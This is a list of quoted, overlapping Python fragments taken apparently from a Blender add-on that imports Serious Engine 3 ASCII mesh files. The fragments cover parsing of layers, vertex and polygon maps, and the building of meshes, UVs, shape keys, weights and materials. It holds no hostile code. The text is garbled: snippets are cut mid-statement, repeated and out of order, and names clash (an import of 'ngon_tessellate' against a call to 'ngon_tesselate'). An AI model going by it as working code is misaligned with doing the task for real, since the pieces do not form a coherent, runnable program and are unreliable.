"import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version)",
"vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer)",
"num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type",
"uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices -",
"len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face",
"num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index",
"maps block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name",
"for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) )",
"return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data =",
"se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx =",
"= [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map",
"0 is_last_value = False last_value_idx = num_of_values - 1 while processed_values < num_of_values:",
"polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\")",
"is_last_value = False last_value_idx = num_of_values - 1 while processed_values < num_of_values: if",
"file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0",
"= True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys +=",
"processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values()",
"uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0",
"= se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return",
"face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\"",
"edge_index_count += 1 faces = [real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test",
"se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in",
"[] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = [] for",
"map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems =",
"ngon_tessellate from . import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\")",
"num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx = num_of_values -",
"se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges",
"elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices):",
"= bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True",
"faces = [real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges,",
"num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if",
"vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH:",
"= se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0])",
"num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type ==",
"se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in",
"= real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0),",
"file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index = num_of_pointers - 1 while",
"se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index =",
"= vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer",
"block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative =",
"last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type",
"next_index = se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index))",
"vertex maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps",
"= get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in",
"elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1",
"get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces:",
"ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges =",
"obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat",
"= se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer,",
"Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map",
"j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0),",
"file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys =",
"get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i",
"last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = []",
"for idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data = (1,0)",
"= file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open",
"uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly =",
"which_edge == edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1])",
"map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices",
"import (Matrix, Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer",
"= vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers",
"while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer",
"block processed_layers += 1 file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices):",
"real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except:",
"in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0]",
"se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add()",
"se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in",
"se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close",
"#close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\")",
"se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name))",
"#close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0",
"get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps",
"k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), (",
"block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx = num_of_values",
"= obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys",
"obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices:",
"#open vertex maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0",
"maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps =",
"morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block",
"fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces = [] se3_surface_map_indices",
"0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type =",
"= file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block",
"num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index in range(num_of_indices): next_index",
"edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face =",
"[real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for",
"[] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers",
"se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index",
"for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat bpy.ops.object.transform_apply(rotation=True) context.view_layer.update() return",
"num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers",
"enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0,",
"edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face",
"block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close elements block",
"return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index =",
"other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data",
"enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if",
"block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex",
"= se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open",
"last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index:",
"num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem",
"= file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs",
"fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev =",
"import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices",
"file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map",
"vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex)",
"0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element",
"= get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count +=",
"vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer =",
"file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while processed_polys < num_of_polys: poly",
"return uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector) import math filepath",
"#open layers block processed_layers = 0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\")",
"return fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0], edge[1])",
"se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces",
"se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index",
"= file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem",
"= se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1])",
"#close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices =",
"block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name =",
"range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index],",
"= file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers < num_of_layers:",
"se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type ==",
"se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers",
"fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0],",
"block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index = num_of_pointers",
"1.0, 0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj)",
"#open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex()",
"se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex",
"uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for",
"= 0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl()",
"return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for",
"se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements",
"num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\")",
"layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys",
"polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block",
"se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0",
"real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv =",
"num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps =",
"se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts:",
"< num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1",
"num_of_values - 1 while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value =",
"poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx())",
"== se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type",
"block processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl()",
"len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index",
"in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1",
"if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else:",
"= se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer",
"mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map",
"file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys =",
"= se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps",
"= vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type ==",
"for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers):",
"= file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while processed_elems <",
"len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for",
"1 file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = []",
"= 0 is_last_value = False last_value_idx = num_of_values - 1 while processed_values <",
"block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count:",
"type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif",
"+ 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def",
"edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data =",
"num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps < num_of_maps:",
"+= 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons",
"processed_layers += 1 file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices",
"get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for",
"= bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices =",
"edges.append(face_edge) edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces",
"poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map)",
"== edge or which_edge == edge_rev: return False return True def get_bl_face_uv_data(real_face, bl_face):",
"file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False",
"for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\"",
"context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map:",
"num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index = num_of_pointers -",
"vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem",
"if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close",
"= se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = []",
"last_value_idx = num_of_values - 1 while processed_values < num_of_values: if processed_values == last_value_idx:",
"num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps =",
"data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import (Matrix,",
"fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)]",
"= se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in",
"uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return",
"vertex map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open",
"count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs <",
"bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world =",
"< num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index",
"file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex",
"1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer",
"se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1",
"1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys",
"tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = [] for tessed_index",
"in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for",
"0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers =",
"current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index != last_index else",
"while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\")",
"vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map",
